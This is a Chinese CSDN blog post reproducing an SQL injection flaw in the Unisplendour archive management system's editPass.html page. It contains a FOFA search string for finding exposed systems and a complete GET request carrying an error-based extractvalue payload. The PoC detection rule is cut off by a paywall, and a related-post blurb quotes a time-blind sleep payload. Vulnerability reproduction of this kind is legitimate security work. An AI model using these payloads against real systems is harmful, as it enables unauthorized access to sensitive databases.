紫光档案管理系统/login/Login/editPass.html存在SQL注入漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-07 13:53:01 修改

阅读量128

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-04-07 13:52:52 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137461560

版权

漏洞复现专栏收录该内容

365 篇文章 170 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

紫光档案管理系统被发现存在SQL注入漏洞，允许攻击者获取数据库敏感信息。文章介绍了漏洞详情，提供了复现步骤和FOFA查询规则，并提出了更新官方补丁的修复建议。

摘要由CSDN通过智能技术生成

产品简介
紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。
漏洞描述
紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
fofa
app=”紫光档案管理系统”
漏洞复现

GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

检测poc规则编写

params: []
name: 紫光档案管理系统/login/Login/editPass.html存在SQL注入漏洞
set: {}
rules:
- method:

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

紫光电子档案管理系统存在SQL注入漏洞（漏洞复现）

薛定谔嘚喵博客

09-06

756

紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

紫光档案管理系统 login Login editPass，2024年最新网络安全进程保活黑科技实现原理解密及方法

2401_83947255的博客

04-16

717

紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。app=”紫光档案管理系统”

参与评论您还未登录，请先登录后发表或查看评论

SQL注入绕过基本防御措施（姿势）小结

Alexz__的博客

09-24

581

前面的浅析sql注入基础里面基本上吧最最基本的sql注入原理说了一下，爆库名啊表名啊字段啊还有盲注的基本原理，布尔型盲注，时间型盲注等等都在这儿有详细的提到 https://blog.csdn.net/Alexz__/article/details/100712648 随着深入练习靶机sqli-labs-master也慢慢发现了sql注入许多不同的全新姿势一个网站要是没有任何防御措施...

Hadoop之hive中sql常用函数汇总

小小良

05-13

3919

1、hive执行引擎 mr/tez/spark set hive.execution.engine = mr; 2、开启动态分区 set hive.exec.dynamic.partition = true; set hive.exec.dynamic.partition.mode = nonstrict; ## 删除分区： ALTER TABLE dm.user_action_sel...

SQL注入时间盲注

qq_43936524的博客

03-13

6457

文章目录sqlmap日记溯源实例发现时间盲注构造时间盲注payload编写脚本成功跑出数据库名 sqlmap日记溯源实例发现时间盲注一个实用的时间盲注fuzz payload 在一次测试中，发现一个参数存在时间盲注，fuzz的payload为desc,(select*from(select+sleep(2)union/**/select+1)a)，其中(select*from(select+sleep(2)union/**/select+1)a))是检测时间盲注时一个很好用的fuzz payload。

concat mysql sql注入_sql注入总结(一)--2018自我整理

weixin_42516040的博客

12-29

279

SQL注入总结前言：本文和之后的总结都是进行总结，详细实现过程细节可能不会写出来~所有sql语句均是mysql数据库的，其他数据库可能有些函数不同，但是方法大致相同0x00 SQL注入原理：SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中。可能存在注入的地方有：登陆页面，搜索，获取HTTP头的信息(client-ip , x-forward-of)，订单处理(二次注...

紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638

weixin_46801402的博客

11-23

1020

紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638

【漏洞复现】紫光电子档案管理系统存在SQL注入

失心少年

09-07

545

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！fofa：app=“紫光档案管理系统”过滤不严格导致sql注入。

记录开发和安全学习过程中的点点滴滴

04-22

1972

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

新思微POS连锁超市管理系统(delphi源码控件)

07-18

新思微POS连锁超市管理系统(delphi源码控件)（这次上传的是控件，方便大家学习与二次开发，请大家支持正版）POS收银系统.超市进销存管理系统.网络版.MSSQL2000★Delphi源码 │ ├─超市收银系统pos(无敌打印)for...

入门网络安全工程师要学习哪些内容

白帽子佳奇的博客

10-10

1279

大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对还是不了解，不知道需要学什么?知了堂小编总结出以下要点。是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和不一样，如果你想成为安全开发工程师，学的侧重点就和安全不一样。学的东西很泛，但选定方向就简单了。大致的学习流程总结就是：网络基础、操作系统、中间件、数据库。其中电脑基础：像系统Windows基础和Linux基础、HTML基础、代码JS基础等。

网络安全（黑客）自学

白帽子凯哥聊黑客

10-10

910

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web安全技术，既有 Web 渗透，也有 Web 防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。

《网络安全：数字时代的坚实护盾》

一名资深Java工程师的技术分享

10-10

429

在当今高度数字化的时代，网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全，更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。

如何用3个月零基础入门网络安全？_网络安全零基础怎么学习

2401_84466224的博客

10-09

950

我们知道计算机最早是在西方发明出来的，很多名词或者代码都是英文的，甚至现有的一些教程最初也是英文原版翻译过来的，而且一个漏洞被发现到翻译成中文一般需要一个星期的时间，在这个时间差上漏洞可能都修补了。”答案是否定的，黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖，然后搭建环境，去复现漏洞，去思考学习笔者的挖洞思维，培养自己的渗透思维。

网络安全（黑客技术）2024年三个月自学手册